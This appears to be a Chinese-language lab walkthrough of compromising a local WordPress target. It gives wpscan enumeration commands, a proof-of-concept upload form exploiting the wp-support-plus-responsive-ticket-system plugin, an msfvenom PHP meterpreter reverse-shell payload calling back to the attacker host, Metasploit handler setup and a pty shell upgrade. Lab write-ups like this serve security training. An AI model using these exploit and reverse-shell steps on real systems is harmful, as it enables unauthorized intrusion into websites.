1、靶机
kali地址:192.168.23.133
靶机地址:192.168.23.150
2、信息收集
nmap扫描C段存活IP
nmap扫描端口
访问80端口,看到是apache2的首页,有一些信息,查看是否有敏感信息
在此页面发现一个默认路径
进行目录扫描,直接扫80端口没什么发现,扫描在默认页面发现的路径,有wordpress的一些默认路径
拼接访问wp-admin
访问wp-includes,存在目录遍历
已知为wordperss,先用wpscan扫一下
wpscan --url http://192.168.23.150/g@web --enumerate p
发现存在插件:wp-support-plus-responsive-ticket-system
扫描用户
wpscan --url http://192.168.23.150/g@web --enumerate u
发现存在wp-local用户,以及一个链接
访问这个api,发现有一个疑似密码的字符串
尝试利用这个来登录,但是登录失败
3、getshell
搜一下刚才扫描到的插件是否存在可利用漏洞,发现该插件<8.0.8版本存在漏洞,靶机插件版本为7.1.3
POC.html
<form method="post" enctype="multipart/form-data" action="http://192.168.23.150/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
使用msfvenom生成shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.23.133 LPORT=4444 -o shell.php
将shell.php后缀改为shell.phtml,通过POC.html上传shell
之后通过目录遍历漏洞寻找上传的shell文件
msf开启监听,反弹shell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.23.133
set LPORT 4444
run
访问上传的shell文件,成功反弹shell,使用以下命令调用/bin/bash
shell
python -c 'import pty; pty.spawn("/bin/bash")'